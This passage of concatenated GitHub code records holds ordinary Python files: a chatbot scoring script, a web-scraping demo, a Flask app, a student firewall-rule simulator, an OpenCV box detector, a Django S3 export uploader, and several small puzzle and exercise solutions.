Ave score: {:.4f}\\n'.format(score, sample_num, score / sample_num))\n history = []\n else:\n history.append(line)\n print('Final ===> Score: {:.2f}. Num: {}. Ave score: {:.4f}\\n\\n'.format(score, sample_num, score / sample_num))\n\n\nif __name__ == '__main__':\n # test_score('../test_1_sample.txt') # 0.979\n test_score('../test_2_sample.txt') # 0.9650\n\n\"\"\"\n[1] 你 告诉 我 一下 几点 了 可以 吗 ?\n现在 是 上午 8 点 哦 。\n那 还好 , 迟 不了 , 谢谢 你 了 。\n不客气哦,对了今天济南晴转多云,南风,最高气温:24℃,最低气温:14℃,注意保暖哦。\n\n[1] 你好 啊 , 麻烦 问 一下 现在 几点 了 ?\n现在 是 20 18 年 10 月 17 日 , 上午 7 : 00 。\n好 嘞 , 谢 啦 , 有 你 真 好 哦 。\n[2] 嘿嘿 , 能 帮到 你 我 很 开心 呢 , 天气 方面 要 不要 看看 呀 ?\n好 啊 , 正想 问 你 呢 。\n成都今天阴转小雨,无持续风向,最高气温:18℃,最低气温:14℃,注意保暖哦。\n\n[1] 我 想 问 有 关于 周杰伦 的 新闻 吗 ?\n当然有啦。18日,周杰伦发布了新歌《等你下课》,勾起了大家对青春的回忆。除了周杰伦,你的青春日记里是否还有这些歌手?陈奕迅所长张惠妹aMEI_feat_阿密特刘若英梁静茹孙燕姿五月天王力宏……你还记得那些骑车上学听歌的岁月吗?\n\"\"\"\n","repo_name":"apple55bc/bd-chat-2020","sub_path":"code/score_fn.py","file_name":"score_fn.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"zh","doc_type":"code","stars":52,"dataset":"github-code","pt":"72"} +{"seq_id":"71422109353","text":"import requests\nimport re\nfrom bs4 import BeautifulSoup\n\nurl = \"http://python123.io/ws/demo.html\"\ndemo = requests.get(url).text\nsoup = BeautifulSoup(demo, \"html.parser\")\n#print(soup.title)\n#print(soup.a)\n#print(soup.prettify())\n\nfor link in soup.find_all('a'):\n print(link.get('href'))\n\nf = soup.find_all(string = re.compile(\"python\"))\nprint(f)","repo_name":"XiaoQiSAMA/PythonReptile","sub_path":"bs4_demo.py","file_name":"bs4_demo.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13072118866","text":"#!/usr/bin/env python3\n\n\"\"\"Contains a function that concatenates two arrays \"\"\"\n\n\ndef cat_arrays(arr1, arr2):\n \"\"\" concat two arrays element-wise \"\"\"\n result = []\n result.extend(arr1)\n result.extend(arr2)\n return result\n","repo_name":"SravanthiSinha/holbertonschool-machine_learning","sub_path":"math/0x00-linear_algebra/6-howdy_partner.py","file_name":"6-howdy_partner.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"11945858722","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom flask import Flask, session, redirect, request\n\nfrom views.login import login\nfrom views.login import logout\nfrom views.login import index\nfrom views.banks import banks\nfrom views.monitor import monitor\n\nimport locale\nlocale.setlocale(locale.LC_ALL, '')\n\n\napp = Flask(__name__)\napp.config.from_object('config')\napp.register_blueprint(login)\napp.register_blueprint(logout)\napp.register_blueprint(index)\napp.register_blueprint(banks)\napp.register_blueprint(monitor)\n\n@app.route(\"/index/sw\")\ndef sw():\n if 'username' not in session:\n return redirect('/login') \n\n if 'theme' not in session:\n session['theme']='b'\n else:\n if session['theme'] == 'a':\n session['theme'] = 'b'\n else:\n session['theme'] = 'a'\n return redirect('/')\nif __name__ == \"__main__\":\n app.run(debug=True, host='0.0.0.0')\n\n","repo_name":"neurotoxin78/1cxml","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42386070982","text":"# Authors: Rumen Kasabov, Michael Radke\n#\n# Firewall program that takes in a configuration file containing rules and 
filters out packets based on those rules.\n#\n\n\nimport sys\nimport os.path\n\n\n# Reads the configuration file\ndef get_configuration(config_file):\n\n configuration_lines = []\n rules = []\n binary_address = \"\"\n\n # Default minimum for an ip is 32 bits of 0s\n min_ip = \"\".ljust(32, \"0\")\n\n # Max is 255 for each 8 bits indicated by 32 1's\n max_ip = \"\".ljust(32, \"1\")\n\n # Open file and read lines making sure to get rid of comments, whitespaces, tabs, etc.\n with open(config_file) as file:\n\n for line in file:\n\n # Make sure the line is not blank\n if line.isspace():\n configuration_lines.append(\" \")\n else:\n configuration_rule = line.strip()\n\n configuration_lines.append(configuration_rule)\n\n file.close()\n\n counter = 0\n\n # Loop through config rules and create an array containing a dictionary for each of the 4 or 5 rules for each line\n while counter < len(configuration_lines):\n\n # Add an empty dictionary when there is a blank line or comment to keep track of lines\n if configuration_lines[counter].startswith(\"#\") or (configuration_lines[counter] == \" \"):\n rule_dictionary = {'direction': None , 'action': None, 'min-ip': None, 'max-ip': None,\n 'ports': None, 'flag': None}\n rules.append(rule_dictionary)\n\n else:\n line_rule = configuration_lines[counter]\n line_rule = line_rule.split()\n\n if not (len(line_rule) == 4 or len(line_rule) == 5):\n print(\"Error: line \" + str(counter) + \" contains an incorrect amount of rules\")\n quit()\n\n else:\n\n direction = line_rule[0]\n action = line_rule[1]\n ip_address = line_rule[2]\n ports = line_rule[3]\n\n # Split port numbers (if any)\n ports = ports.split(\",\")\n\n if len(line_rule) == 5:\n flag = line_rule[4]\n\n # Check if the flag is valid\n if flag != \"established\":\n print(\"Line number \" + str(counter + 1) + \" contains an invalid flag: \" + flag)\n quit()\n\n try:\n # Split ip address and routing prefix\n ip_address = ip_address.split(\"/\")\n\n # If a non wildcard address' length is 1 there is no routing prefix\n if len(ip_address) == 1:\n\n if ip_address[0] != \"*\":\n\n # Split each 8 bits of address\n ip_address[0] = ip_address[0].split(\".\")\n\n if len(ip_address[0]) == 4:\n\n for ip in ip_address[0]:\n\n # Check that each 8 bits of the address are within the correct range\n if int(ip) < 0 or int(ip) > 255:\n print(\"Invalid ip address range has been provided on line \" + str(counter + 1))\n quit()\n\n # Otherwise we convert each 8 bits of address into binary\n else:\n\n # The splice [2:] below gets rid of 0b created to indicate binary in python\n binary_address += str(bin(int(ip)))[2:].zfill(8)\n\n # Set the minimum and maximum values of the ip address\n # In this case, the min and max is the same because the routing prefix is all 32 bytes\n min_ip = binary_address\n max_ip = binary_address\n\n # Re-initialize to 0\n binary_address = \"\"\n\n else:\n print(\"Invalid ip address size provided on line \" + str(counter + 1))\n quit()\n\n # If a wildcard is used, we do not change the min and max values for an ip address\n elif ip_address[0] == \"*\":\n min_ip = \"\".ljust(32, '0')\n max_ip = \"\".ljust(32, '1')\n\n # Otherwise there is an routing prefix\n elif len(ip_address) == 2:\n\n routing_prefix = ip_address[1]\n\n # Check if the routing prefix is within correct range\n if int(routing_prefix) < 0 or int(routing_prefix) > 32:\n print(\"Invalid routing prefix provided on ip address on line \" + str(counter + 1))\n quit()\n\n else:\n\n # Split each 8 bits of address\n ip_address[0] = 
ip_address[0].split(\".\")\n\n if len(ip_address[0]) == 4:\n\n for ip in ip_address[0]:\n\n # Check that each 8 bits of the address are within the correct range\n if int(ip) < 0 or int(ip) > 255:\n print(\"Invalid ip address range has been provided on line \" + str(counter + 1))\n quit()\n\n # Otherwise we convert each 8 bits of address into binary\n else:\n\n # The splice [2:] below gets rid of 0b created to indicate binary in python\n binary_address += str(bin(int(ip)))[2:].zfill(8)\n\n # Set the minimum and maximum values for the 32 bit ip address based on the provided\n # routing prefix\n # min-ip will set everything after the leading bits in ip address to 0's (min value)\n # based on the prefix\n min_ip = binary_address[:int(routing_prefix)].ljust(32, '0')\n\n # max-ip will set everything after the leading bits in ip address to 1's (max value)\n # based on the prefix\n max_ip = binary_address[:int(routing_prefix)].ljust(32, '1')\n\n binary_address = \"\"\n\n\n else:\n print(\"Invalid ip address size provided on line \" + str(counter + 1))\n quit()\n\n except Exception as e:\n print(\"Invalid ip address number on line \" + str(counter + 1))\n print(e)\n quit()\n\n if not (direction == \"in\" or direction == \"out\"):\n\n print(\"Line number \" + str(counter + 1) + \" contains an invalid direction: \" + direction)\n quit()\n\n elif not (action == \"accept\" or action == \"drop\" or action == \"reject\"):\n\n print(\"Line number \" + str(counter + 1) + \" contains an invalid action: \" + action)\n quit()\n\n # Try catch block in case configuration file has a non-integer provided as a port rule\n try:\n\n for port in ports:\n\n # Check for wildcard\n if port == \"*\":\n pass\n\n # Check for valid port range\n elif int(port) < 0 or int(port) > 65535:\n\n print(\"Line number \" + str(counter + 1) + \" contains an invalid port range: \" + \",\".join(ports))\n quit()\n\n except Exception as e:\n\n print(\"Invalid port number on line \" + str(counter + 1))\n print(e)\n quit()\n\n if len(line_rule) == 5:\n\n flag_boolean = \"1\"\n rule_dictionary = {'direction': direction, 'action': action, 'min-ip': min_ip, 'max-ip': max_ip,\n 'ports': ports, 'flag': flag_boolean}\n\n else:\n rule_dictionary = {'direction': direction, 'action': action, 'min-ip': min_ip, 'max-ip': max_ip,\n 'ports': ports, 'flag': None}\n\n # Put dictionary in rules array\n rules.append(rule_dictionary)\n\n counter += 1\n\n return rules\n\n\ndef get_packets():\n\n packets = []\n binary_address = \"\"\n decimal_address = \"\"\n\n # Take count on the current line/packet we are reading from STDIN\n counter = 1\n\n # Read STDIN line by line, appending each packet in each line to an array\n for line in sys.stdin.readlines():\n\n packet = line.strip()\n\n # Split each field into elements in an array\n packet = packet.split()\n\n # Check if packet contains the valid number of fields\n if len(packet) != 4:\n print(\"Packet number \" + str(counter) + \" contains an invalid number of fields.\")\n quit()\n\n direction = packet[0]\n ip_address = packet[1]\n decimal_address = ip_address\n port = packet[2]\n flag = packet[3]\n\n # Check if direction is valid\n if not (direction == \"in\" or direction == \"out\"):\n\n print(\"Packet number \" + str(counter) + \" contains an invalid direction: \" + direction)\n quit()\n\n try:\n\n # Split each 8 bits in the ip address into array elements\n ip_address = ip_address.split(\".\")\n\n if len(ip_address) != 4:\n print(\"Packet number \" + str(counter) + \" contains an invalid ip address size.\")\n quit()\n\n 
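The manual prefix-padding above can be cross-checked against the stdlib ipaddress module, whose network_address and broadcast_address are exactly the rule's min-ip and max-ip. A sketch with an illustrative CIDR:

```python
import ipaddress

# For a rule like 142.58.22.0/24 (address made up for the example):
net = ipaddress.ip_network('142.58.22.0/24', strict=False)
min_ip = int(net.network_address)    # same as padding the prefix with 0s
max_ip = int(net.broadcast_address)  # same as padding the prefix with 1s

packet = int(ipaddress.ip_address('142.58.22.7'))
print(min_ip <= packet <= max_ip)  # True
```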
for ip in ip_address:\n\n # Check that each 8 bits of the address are within the correct range\n if int(ip) < 0 or int(ip) > 255:\n print(\"Packet number \" + str(counter) + \" contains an invalid ip address range: \" + ip)\n quit()\n\n # Otherwise we convert each 8 bits of address into binary\n else:\n\n # The splice [2:] below gets rid of 0b created to indicate binary in python\n binary_address += str(bin(int(ip)))[2:].zfill(8)\n\n # Check for valid port range\n if int(port) < 0 or int(port) > 65535:\n\n print(\"Packet number \" + str(counter) + \" contains an invalid port range: \" + port)\n quit()\n\n # If the flag given is not 0 or 1 we indicate an error.\n if not (flag == \"0\" or flag == \"1\"):\n\n print(\"Packet number \" + str(counter) + \" contains an invalid flag: \" + flag)\n quit()\n\n\n except Exception as e:\n print(\"Invalid packet format has been received on line \" + str(counter))\n print(e)\n quit()\n\n packet_dictionary = {'direction': direction, 'decimal-address': decimal_address, 'ip_address': binary_address,\n 'port': port, 'flag': flag}\n\n packets.append(packet_dictionary)\n\n # Clear binary address and increment counter\n binary_address = \"\"\n counter += 1\n\n return packets\n\n\n# Filter the incoming and outgoing packets based on the established firewall rules\ndef filter_packets(rules, packets):\n\n # Check if any of the rules apply for each packet\n for packet in packets:\n\n rule_line_number = 0\n\n for rule in rules:\n\n # Check if the rule matches up to any of the packets and print output based on that match\n if rule['direction'] == packet['direction']:\n\n matching_port = False\n\n # Check if there is a matching port for the packet\n for port in rule['ports']:\n\n if port == \"*\" or port == packet['port']:\n\n matching_port = True\n\n # If port matches we check the ip range and any flags\n if matching_port is True:\n\n min_ip = rule['min-ip']\n max_ip = rule['max-ip']\n packet_address = packet['ip_address']\n\n # Convert binary strings of addresses to an integer\n min_ip = int(min_ip, 2)\n max_ip = int(max_ip, 2)\n packet_address = int(packet_address, 2)\n\n # If the packet address is within the correct rule range for the current rule\n # we check the flag and print output\n if packet_address >= min_ip and packet_address <= max_ip:\n\n if rule['flag'] == \"1\" and packet['flag'] == \"1\":\n\n print(rule['action'] + \"(\" + str(rule_line_number + 1) + \") \" + packet['direction'] + \" \"\n + packet['decimal-address'] + \" \" + packet['port'] + \" \" + packet['flag'])\n\n break\n\n elif rule['flag'] is None:\n\n print(rule['action'] + \"(\" + str(rule_line_number + 1) + \") \" + packet['direction'] + \" \"\n + packet['decimal-address'] + \" \" + packet['port'] + \" \" + packet['flag'])\n\n break\n\n rule_line_number += 1\n\n # If the rule line exceeds the number of rules then there must not be a rule for that packet\n if rule_line_number >= len(rules):\n print(\"drop() \" + packet['direction'] + \" \"\n + packet['decimal-address'] + \" \" + packet['port'] + \" \" + packet['flag'])\n\n break\n\n\nif __name__ == \"__main__\":\n\n config_filename = sys.argv[1]\n\n # Check if the file exists in directory\n if os.path.isfile(config_filename):\n\n # Read in the configuration from the file\n rules = get_configuration(config_filename)\n\n # Get the packets\n packets = get_packets()\n\n # Filter the packets\n filter_packets(rules, packets)\n\n else:\n\n print(\"The file you have provided does not 
exist.\")","repo_name":"mradk331/CPSC-526-Firewall-simulator","sub_path":"fw.py","file_name":"fw.py","file_ext":"py","file_size_in_byte":14459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41507471160","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 4 18:43:55 2021\r\nRVD-minor: Project\r\nPackage detection \r\n\r\nMichael Koreneef\r\n18089127\r\n\"\"\"\r\nimport cv2\r\nimport numpy as np\r\n\r\ndef bigcontour(contours):\r\n biggest = np.array([])\r\n max_area = 0\r\n for i in contours:\r\n area = cv2.contourArea(i)\r\n if area > 500:\r\n arclen = cv2.arcLength(i, True) \r\n approx = cv2.approxPolyDP(i, 0.02* arclen, True)\r\n print(approx)\r\n if area > max_area and len(approx) == 4:\r\n biggest = approx\r\n max_area = area\r\n return biggest, max_area\r\n\r\ndef reorder(points):\r\n points = points.reshape((4,2))\r\n pointsnew = np.zeros((4,1,2), dtype=np.int32)\r\n add = points.sum(1)\r\n \r\n pointsnew[0] = points[np.argmin(add)]\r\n pointsnew[3] = points[np.argmax(add)]\r\n diff = np.diff(points, axis=1)\r\n pointsnew[1] = points[np.argmin(diff)]\r\n pointsnew[2] = points[np.argmax(diff)]\r\n \r\n return pointsnew\r\n#image read\r\nimage = cv2.imread('package1.jpeg',20)\r\ncv2.imshow(\"Image\", image)\r\n\r\n# image to gray values\r\ngrayImage = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\ncv2.imshow(\"Gray image\", grayImage)\r\n\r\n# blurred image\r\nblurImage = cv2.medianBlur(grayImage,9)\r\ncv2.imshow(\"Blur image\", blurImage)\r\n\r\ncannyImage = cv2.Canny(blurImage,50,200)\r\ncv2.imshow(\"Canny image\", cannyImage)\r\n\r\nkernel = np.ones((3,3))\r\nimgDial = cv2.dilate(cannyImage,kernel,iterations=2)\r\nimgThre = cv2.erode(imgDial,kernel,iterations=1)\r\ncv2.imshow(\"dial image\", imgDial)\r\ncv2.imshow(\"erode image\", imgThre)\r\n\r\ncnts, hierarchy = cv2.findContours(imgThre, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\ncontourImage = image.copy()\r\ncv2.drawContours(contourImage, cnts, -1, (0, 0, 255), 1, cv2.LINE_AA)\r\ncv2.imshow(\"contour image\", contourImage)\r\n\r\nbiggest, maxarea = bigcontour(cnts)\r\nprint(biggest, maxarea)\r\n\r\nif biggest.size !=0:\r\n biggestr = reorder(biggest)\r\n print(biggestr)\r\n \r\ncanvas = image.copy()\r\nM = cv2.moments(biggest) \r\ncx = int(M[\"m10\"] / M[\"m00\"])\r\ncy = int(M[\"m01\"] / M[\"m00\"])\r\ncv2.circle(canvas, (cx,cy), (1), (0, 255, 0),3) #tekenen middelpunt\r\ncv2.circle(canvas, (biggestr[0][0][0],biggestr[0][0][1]), (1), (255, 0, 0),3) #tekenen middelpunt\r\ncv2.circle(canvas, (biggestr[1][0][0],biggestr[1][0][1]), (1), (0, 255, 0),3) #tekenen middelpunt\r\ncv2.circle(canvas, (biggestr[2][0][0],biggestr[2][0][1]), (1), (0, 0, 255),3) #tekenen middelpunt\r\ncv2.circle(canvas, (biggestr[3][0][0],biggestr[3][0][1]), (1), (255, 255, 0),3) #tekenen middelpunt\r\n\r\ncv2.imshow(\"detected\", canvas)\r\n\r\n#depth calculations\r\nw = 8.7 #width in cm\r\nw1 = biggestr[1][0][0] - biggestr[0][0][0]\r\nw2 = biggestr[3][0][0] - biggestr[2][0][0]\r\nl1 = biggestr[2][0][1] - biggestr[0][0][1]\r\nl2 = biggestr[3][0][1] - biggestr[1][0][1]\r\nl = (l1 + l2)/2\r\npixelw1 = w/w1\r\npixelw2 = w/w2\r\npixell1 = pixelw1 * l\r\npixell2 = pixelw2 * l\r\ngeml = (pixell1 + pixell2)/2\r\ncenterg = geml/2\r\n\r\nprint(pixelw1, pixelw2)\r\nprint(pixell1, pixell2)\r\nprint(geml, centerg)\r\n# destroy the windows by press any key.\r\nkey = cv2.waitKey(0) 
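The reorder() helper above sorts the four detected corners by coordinate sum and difference; a numpy-only check of that convention on a known square:

```python
import numpy as np

# Four corners of a square in arbitrary order, shaped like an OpenCV contour.
points = np.array([[[50, 10]], [[10, 10]], [[10, 50]], [[50, 50]]])

pts = points.reshape((4, 2))
ordered = np.zeros((4, 1, 2), dtype=np.int32)
s = pts.sum(1)               # x + y per corner
d = np.diff(pts, axis=1)     # y - x per corner
ordered[0] = pts[np.argmin(s)]  # top-left: x+y minimal
ordered[3] = pts[np.argmax(s)]  # bottom-right: x+y maximal
ordered[1] = pts[np.argmin(d)]  # top-right: y-x minimal
ordered[2] = pts[np.argmax(d)]  # bottom-left: y-x maximal
print(ordered.reshape(4, 2))    # [[10 10] [50 10] [10 50] [50 50]]
```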
\r\ncv2.destroyAllWindows()","repo_name":"HHS-RVD-PV/realsense-phonebox-detection","sub_path":"package_detection.py","file_name":"package_detection.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31430190562","text":"\"\"\"\nReporting tool utils\n\"\"\"\n\n\nimport csv\nimport uuid\nfrom abc import abstractmethod\nfrom typing import Any, Iterable, Optional\n\nimport boto3\nimport dicttoxml\nfrom botocore.client import BaseClient\nfrom botocore.config import Config\nfrom django.conf import settings\nfrom django.core.files.base import ContentFile\nfrom django.utils.translation import gettext_lazy as _\nfrom rest_framework.serializers import Serializer\n\nfrom shared.models import User\n\n\nclass DictWriter(csv.DictWriter):\n \"\"\"\n Deals with custom header labels\n \"\"\"\n def __init__(self, f, fieldnames, restval=\"\", extrasaction=\"raise\",\n dialect=\"excel\", header: Optional[Iterable[str]] = None,\n *args, **kwds):\n super().__init__(f, fieldnames, restval, extrasaction, dialect, *args,\n **kwds)\n\n self._header = header\n\n def writeheader(self) -> Any:\n if self._header:\n header = dict(zip(self.fieldnames, self._header))\n return self.writerow(header)\n\n return super().writeheader()\n\n\nclass RelevantDataFileGenerator:\n \"\"\"\n Generates diverse file from serializer data\n \"\"\"\n FORMAT_XML = 'xml'\n FORMAT_CSV = 'csv'\n\n def __init__(self, serializer: Serializer, export_format: str):\n \"\"\"\n :type serializer: Serializer\n :type export_format: str\n \"\"\"\n self.export_format = export_format\n self._serializer = serializer\n\n @abstractmethod\n def __str__(self) -> str:\n \"\"\"\n Returns generated data as string\n\n :rtype: str\n \"\"\"\n\n @staticmethod\n def instantiate(extension: str,\n serializer: Serializer) -> 'RelevantDataFileGenerator':\n \"\"\"\n :type extension: str\n :type serializer: Serializer\n\n :rtype: RelevantDataFileGenerator\n \"\"\"\n if extension == RelevantDataFileGenerator.FORMAT_XML:\n cls = XMLRelevantDataFileGenerator\n elif extension == RelevantDataFileGenerator.FORMAT_CSV:\n cls = CSVRelevantDataFileGenerator\n\n return cls(serializer, extension)\n\n\nclass CSVRelevantDataFileGenerator(RelevantDataFileGenerator):\n \"\"\"\n Generates csv from serializer data\n \"\"\"\n COLUMNS_MAP = {\n 'id': _('ID'),\n 'sensor_GPS_lat': _('GPS Latitude'),\n 'sensor_GPS_long': _('GPS Longitude'),\n 'location_x': _('Location X'),\n 'location_y': _('Location Y'),\n 'location_z': _('Location Z'),\n 'orient_theta': _('Orient theta'),\n 'orient_phi': _('Orient phi'),\n 'timestamp': _('Time stamp'),\n 'project_name': _('Project name'),\n 'sensor_id': _('Sensor ID'),\n 'license_plate_number': _('Vehicle registration plate'),\n 'event_object': _('Object Type'),\n 'object_class': _('Object class'),\n 'vehicle_classification': _('Vehicle classification'),\n 'ambient_weather': _('Ambient weather condition'),\n 'road_weather': _('Road weather'),\n 'stopped_vehicle_detection': _('Stopped vehicle detection'),\n 'tagged_data': _('Tagged data'),\n 'is_tagged_data': _('Is tagged data'),\n 'license_plate_location': _('License plate location'),\n 'face_location': _('Face location'),\n 'cad_file_tag': _('CAD file tag'),\n 'road_temperature': _('Road temperature'),\n 'ambient_temperature': _('Ambient temperature'),\n 'pedestrian_flow_transit_method': _('Pedestrian Flow Transit Method'),\n 'pedestrian_flow_number_of_objects': _('Pedestrian Flow '\n 'Number Of Objects'),\n 
'traffic_flow_number_of_objects': _('Number of objects'),\n 'traffic_flow_observation_end_dt': _('Observation end'),\n 'traffic_flow_observation_start_dt': _('Observation start'),\n 'traffic_flow_number_of_directions': _('Number of directions'),\n 'traffic_flow_directions_statistics': _('Directions statistics')\n }\n\n def __init__(self, serializer: 'RelevantDataGeneratorSeriralizer',\n export_format: str):\n \"\"\"\n :type serializer: RelevantDataGeneratorSeriralizer\n :type export_format: str\n \"\"\"\n super().__init__(serializer, export_format)\n\n self.__file = ContentFile('')\n\n def through(self):\n \"\"\"\n Puts rows to the csv file row by row\n \"\"\"\n csv_writer = DictWriter(\n f=self.__file,\n fieldnames=self._serializer.child.Meta.fields,\n header=self.header\n )\n csv_writer.writeheader()\n\n for rd_item in self._serializer.data:\n csv_writer.writerow(rd_item)\n\n def __str__(self):\n self.through()\n\n return self.__file.open('r').file.getvalue()\n\n @property\n def header(self) -> Iterable[str]:\n \"\"\"\n Return header labels\n\n :rtype: Iterable[str]\n \"\"\"\n columns_map = getattr(self, 'COLUMNS_MAP')\n\n if columns_map:\n return [\n columns_map.get(field, field)\n for field\n in self._serializer.child.Meta.fields\n ]\n\n return self._serializer.child.Meta.fields\n\n\nclass XMLRelevantDataFileGenerator(RelevantDataFileGenerator):\n \"\"\"\n Generates xml from serializer data\n \"\"\"\n def __str__(self) -> str:\n return dicttoxml.dicttoxml(self._serializer.data).decode(\"utf-8\")\n\n\nclass S3FileUploader:\n \"\"\"\n Uploads file to S3\n \"\"\"\n\n def __init__(self, file, **kwargs):\n \"\"\"\n :param file: file to be uploaded\n \"\"\"\n self._file = file\n self.__key = None\n self.__s3 = None\n\n @property\n def key(self) -> str:\n \"\"\"\n Generates remote storage file key\n\n :rtype: str\n \"\"\"\n if self.__key is None:\n self.__key = self.generate_key()\n\n return self.__key\n\n @abstractmethod\n def generate_key(self) -> str:\n \"\"\"\n Generates obj key\n\n :rtype: str\n \"\"\"\n\n def upload_and_get_link(self) -> str:\n \"\"\"\n Uploads file and returns the link to it\n\n :rtype: str\n \"\"\"\n self.upload()\n\n return self.url\n\n def upload(self) -> dict:\n \"\"\"\n Uploads file\n\n :rtype: dict\n \"\"\"\n return self.s3_client.put_object(\n Body=str(self._file),\n Bucket=settings.AWS_CLIENT_PORTAL_BUCKET,\n Key=self.key\n )\n\n @property\n def url(self) -> str:\n \"\"\"\n Uploaded file url\n\n :rtype: str\n \"\"\"\n return self.s3_client.generate_presigned_url(\n 'get_object',\n Params={\n 'Bucket': settings.AWS_CLIENT_PORTAL_BUCKET,\n 'Key': self.key\n },\n ExpiresIn=3600 * 24\n )\n\n @property\n def s3_client(self) -> BaseClient:\n \"\"\"\n Connection to S3 bucket\n\n :rtype: BaseClient\n \"\"\"\n if self.__s3 is None:\n self.__s3 = boto3.client(\n 's3',\n aws_access_key_id=settings.AWS_ACCESS_KEY_ID,\n aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY,\n config=Config(signature_version='s3v4')\n )\n\n return self.__s3\n\n\nclass RelvantDataExportUploader(S3FileUploader):\n \"\"\"\n Relevant data file uploader\n \"\"\"\n def __init__(self, file: RelevantDataFileGenerator, user: User):\n super().__init__(file)\n\n self.__user = user\n\n def generate_key(self) -> str:\n return 'relevant_data/organization_{}/{}.{}'.format(\n self.__user.organization.id,\n uuid.uuid4().hex,\n self._file.export_format\n )\n\n\nclass FeatureRequestUploader(S3FileUploader):\n \"\"\"\n Feature request file uploader\n \"\"\"\n def __init__(self, file: ContentFile, upload_key: str,\n 
organization_id: int):\n super().__init__(file)\n\n self.__upload_key = upload_key\n self.__organization_id = organization_id\n\n def generate_key(self) -> str:\n return '{}/organization_{}/{}'.format(\n self.__upload_key,\n self.__organization_id,\n self._file.name\n )\n","repo_name":"ReconAI/ClientPortal","sub_path":"client_portal/reporting_tool/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1642443186","text":"from aocd import get_data\nfrom ..utils.aoctimer import aoctimer\n\n\ndef characters_processed(data: str, window_size: int) -> int:\n for i in range(window_size - 1, len(data)):\n sequence = data[i - window_size + 1 : i + 1]\n if len(set(sequence)) == len(sequence):\n return i + 1\n\n\n@aoctimer\ndef part_a(data):\n return characters_processed(data, 4)\n\n\n@aoctimer\ndef part_b(data):\n return characters_processed(data, 14)\n\n\ntest_data_1 = \"mjqjpqmgbljsphdztnvjfqwrcgsmlb\"\ntest_data_2 = \"bvwbjplbgvbhsrlpgdmjqwftvncz\"\ntest_data_3 = \"nppdvjthqldpwncqszvftbrmjlhg\"\ntest_data_4 = \"nznrnfrfntjfmvfwmzdfjlvtqnbhcprsg\"\ntest_data_5 = \"zcfzfwzzqfrljwzlrfnpqdbhtmscgvjw\"\n\nif __name__ == \"__main__\":\n assert part_a(test_data_1) == 7\n assert part_a(test_data_2) == 5\n assert part_a(test_data_3) == 6\n assert part_a(test_data_4) == 10\n assert part_a(test_data_5) == 11\n assert part_b(test_data_1) == 19\n assert part_b(test_data_2) == 23\n assert part_b(test_data_3) == 23\n assert part_b(test_data_4) == 29\n assert part_b(test_data_5) == 26\n\n data = get_data(day=6, year=2022)\n print(part_a(data))\n print(part_b(data))\n","repo_name":"aglorei/aoc2022-py","sub_path":"src/day06/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26706338050","text":"from sys import stdin\r\n\r\nA, B = [int(data) for data in stdin.readlines()]\r\n\r\ntotal = A * B\r\n\r\nremains = []\r\n\r\nwhile B >= 10:\r\n B, remain = divmod(B, 10)\r\n remains.append(remain)\r\n\r\nremains.append(B)\r\n\r\nfor remain in remains:\r\n print(remain * A)\r\n\r\nprint(total)","repo_name":"Melting-Face/baekjoon","sub_path":"백준/Bronze/2588. 
곱셈/곱셈.py","file_name":"곱셈.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16245721597","text":"\"\"\"Find loop length in a singly linked list.\"\"\"\nfrom collections import defaultdict\n\n\nclass Node:\n def __init__(self, data: int) -> None:\n self.data = data\n self.next = None\n\n\nclass SingleLinkedList:\n def __init__(self) -> None:\n self.head: Node = None\n self.tail: Node = None\n\n def print_list(self) -> None:\n cur: Node = self.head\n while cur:\n print(cur.data, end=\"->\")\n cur = cur.next\n print(\"Null\")\n\n\ndef loop_length(head: Node) -> int:\n # Brute force solution\n if head is None:\n return 0\n temp: Node = head\n hsh = defaultdict(int)\n t: int = 1\n while temp:\n if hsh[temp]:\n length: int = t - hsh[temp]\n return length\n hsh[temp] = t\n t += 1\n temp = temp.next\n\n return 0\n\n\ndef find_length(slow: Node, fast: Node) -> int:\n cnt: int = 1\n fast = fast.next\n while slow != fast:\n cnt += 1\n fast = fast.next\n\n return cnt\n\n\ndef loop_length_optimal(head: Node) -> int:\n slow: Node = head\n fast: Node = head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n\n if slow == fast:\n return find_length(slow=slow, fast=fast)\n\n return 0\n\n\nif __name__ == \"__main__\":\n llist: SingleLinkedList = SingleLinkedList()\n print(llist.head)\n node1: Node = Node(1)\n node2: Node = Node(2)\n node3: Node = Node(3)\n node4: Node = Node(4)\n node5: Node = Node(5)\n node6: Node = Node(6)\n node7: Node = Node(7)\n node8: Node = Node(8)\n node9: Node = Node(9)\n node1.next = node2\n node2.next = node3\n node3.next = node4\n node4.next = node5\n node5.next = node6\n node6.next = node7\n node7.next = node8\n node8.next = node9\n llist.head = node1\n node9.next = node3\n # llist.print_list()\n print(loop_length(head=llist.head))\n 